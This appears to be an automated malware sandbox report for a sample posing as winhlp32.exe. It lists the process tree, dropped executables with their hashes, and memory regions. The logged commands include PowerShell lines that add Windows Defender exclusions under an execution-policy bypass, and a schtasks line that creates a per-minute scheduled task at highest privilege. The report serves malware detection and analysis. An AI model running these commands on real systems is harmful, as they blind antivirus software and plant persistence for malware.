C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k appmodel -s StateRepository1⤵
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s IKEEXT1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s LanmanServer1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Browser1⤵
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s CryptSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s WpnService1⤵
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s TokenBroker1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
-
C:\Users\Admin\AppData\Local\Temp\winhlp32.exe"C:\Users\Admin\AppData\Local\Temp\winhlp32.exe"2⤵
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\x4L.exe"C:\Windows\System32\x4L.exe"3⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\x4L.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'x4L.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\x4L.exe'4⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "x4L" /tr "C:\Users\Admin\AppData\Roaming\x4L.exe"4⤵
- Creates scheduled task(s)
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Windows\System32\x4Shellcode.exe"C:\Windows\System32\x4Shellcode.exe"3⤵
- Executes dropped EXE
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp7FAF.tmp.bat""3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\system32\timeout.exetimeout 34⤵
- Delays execution with timeout.exe
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s CDPSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc1⤵
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s wlidsvc1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\ApplicationFrameHost.exeC:\Windows\system32\ApplicationFrameHost.exe -Embedding1⤵
-
C:\Windows\System32\InstallAgent.exeC:\Windows\System32\InstallAgent.exe -Embedding1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}1⤵
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
3KB
MD58592ba100a78835a6b94d5949e13dfc1
SHA163e901200ab9a57c7dd4c078d7f75dcd3b357020
SHA256fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c
SHA51287f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5e17c9e56f54fd40c47e128741ffb77e3
SHA1714e2b000c168ca9dcdf2887ccf82e4494e058cc
SHA256b14046c78530a73a7dec1fac039d44693d5fd0fce7d6515c21fe646cd58df17c
SHA512e58eb04c5cefe6474b7699ef2add288aba0a8127c81dfd3f4be6dad7b90f3af93a8c96f5d99dbc8df9d6b88347e892225ba0e528673d585209d773240379a37a
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD53c1a969865f69f3c4d7900237eb53edf
SHA17f380a06239142fb9092f67a145cb343577cd211
SHA256f2f0972f48e2b16c38ab6faa526c6c1e0b23f2685d9db139735092ab79219b12
SHA512aa42eefb54ab76a7773b6ff312450d2615c5bf879942f16e2bf2b3ccbb7605b21fcad095258a72571fc3399d2d9b8da04f70f9c79c776188e678dcb7d1abb932
-
C:\Users\Admin\AppData\Local\Temp\tmp7FAF.tmp.batFilesize
160B
MD59fe35ff2c475ab06e8a218dc6a49b8fd
SHA19ed4f0001110869f80cd6ed9d12c2f4f620d4960
SHA256a383268390c816e6ae53192a2f638099b16f40c444b8d6dcb5d5d180c9afca7c
SHA51234283cfa9cd34d80b37695b3c31565e450dd4dd13bba4a44a932c5410f6c112fed572f3cfa324f6ad8c2f37e22e7237818cf8914f3bef1355acf63f7707ae169
-
C:\Windows\System32\x4L.exeFilesize
68KB
MD59ecdf1a7818f7e9952b6041e3aa19b7a
SHA193a8357036356c1c1e20a5cf69fdbad877ce8a0f
SHA2560771bbea72ecea02dc0e9641cc91c039cccbcde0936716a6e3bc21b1203707e4
SHA512847651f0a8cd4c5b791de90ac5987ba1ba4eca87e72df479c6c8bfc526788d22bef7123f72864a1a91aa94437d47b22cc5159d83bca6a71e246dad12fd292853
-
C:\Windows\System32\x4Shellcode.exeFilesize
164KB
MD58a7bee2c8cec6ac50bc42fe03d3231e6
SHA1ebc599a15f061a70f6b3ee74b9acfa4e3b4d299d
SHA256c8139f7fcde9c68cd331bcd438dfea7f02c463c6372dc477ab305da518483db8
SHA51234370b6f162cb752b1cb91d689705e6f0f247e02744bbbe85347d20cd89e02aba7c5e9e22bb63acc49b4fdc062de12ccf24f481a18c18d2094e1506bb143cad5
-
C:\Windows\Temp\__PSScriptPolicyTest_nqongnxe.zqu.ps1Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
memory/584-63-0x00000272AB210000-0x00000272AB236000-memory.dmpFilesize
152KB
-
memory/584-64-0x00000272AB240000-0x00000272AB26C000-memory.dmpFilesize
176KB
-
memory/584-72-0x00007FFE5D4F0000-0x00007FFE5D500000-memory.dmpFilesize
64KB
-
memory/584-71-0x00000272AB240000-0x00000272AB26C000-memory.dmpFilesize
176KB
-
memory/584-65-0x00000272AB240000-0x00000272AB26C000-memory.dmpFilesize
176KB
-
memory/640-83-0x00007FFE5D4F0000-0x00007FFE5D500000-memory.dmpFilesize
64KB
-
memory/640-76-0x0000024E7AD10000-0x0000024E7AD3C000-memory.dmpFilesize
176KB
-
memory/640-82-0x0000024E7AD10000-0x0000024E7AD3C000-memory.dmpFilesize
176KB
-
memory/728-94-0x00007FFE5D4F0000-0x00007FFE5D500000-memory.dmpFilesize
64KB
-
memory/728-87-0x000002C5325D0000-0x000002C5325FC000-memory.dmpFilesize
176KB
-
memory/728-93-0x000002C5325D0000-0x000002C5325FC000-memory.dmpFilesize
176KB
-
memory/908-98-0x0000022578C30000-0x0000022578C5C000-memory.dmpFilesize
176KB
-
memory/908-104-0x0000022578C30000-0x0000022578C5C000-memory.dmpFilesize
176KB
-
memory/908-105-0x00007FFE5D4F0000-0x00007FFE5D500000-memory.dmpFilesize
64KB
-
memory/992-109-0x000001D0EFC00000-0x000001D0EFC2C000-memory.dmpFilesize
176KB
-
memory/1676-18-0x00007FFE8F500000-0x00007FFE8FEEC000-memory.dmpFilesize
9.9MB
-
memory/1676-14-0x00000000009D0000-0x00000000009E8000-memory.dmpFilesize
96KB
-
memory/1676-960-0x00007FFE8F500000-0x00007FFE8FEEC000-memory.dmpFilesize
9.9MB
-
memory/1676-961-0x00007FFE8F500000-0x00007FFE8FEEC000-memory.dmpFilesize
9.9MB
-
memory/2080-28-0x000001F27E620000-0x000001F27E696000-memory.dmpFilesize
472KB
-
memory/2080-47-0x00007FFE9D460000-0x00007FFE9D63B000-memory.dmpFilesize
1.9MB
-
memory/2080-48-0x00007FFE9AA30000-0x00007FFE9AADE000-memory.dmpFilesize
696KB
-
memory/2080-25-0x000001F27E460000-0x000001F27E482000-memory.dmpFilesize
136KB
-
memory/2080-46-0x000001F27E7A0000-0x000001F27E7CA000-memory.dmpFilesize
168KB
-
memory/2772-1-0x00000000004F0000-0x000000000052A000-memory.dmpFilesize
232KB
-
memory/2772-2-0x00007FFE8F500000-0x00007FFE8FEEC000-memory.dmpFilesize
9.9MB
-
memory/2772-19-0x00007FFE8F500000-0x00007FFE8FEEC000-memory.dmpFilesize
9.9MB
-
memory/2772-0-0x00007FFE8F503000-0x00007FFE8F504000-memory.dmpFilesize
4KB
-
memory/4424-49-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/4424-52-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/4424-57-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/4424-51-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/4424-50-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/4424-60-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/4424-58-0x00007FFE9D460000-0x00007FFE9D63B000-memory.dmpFilesize
1.9MB
-
memory/4424-59-0x00007FFE9AA30000-0x00007FFE9AADE000-memory.dmpFilesize
696KB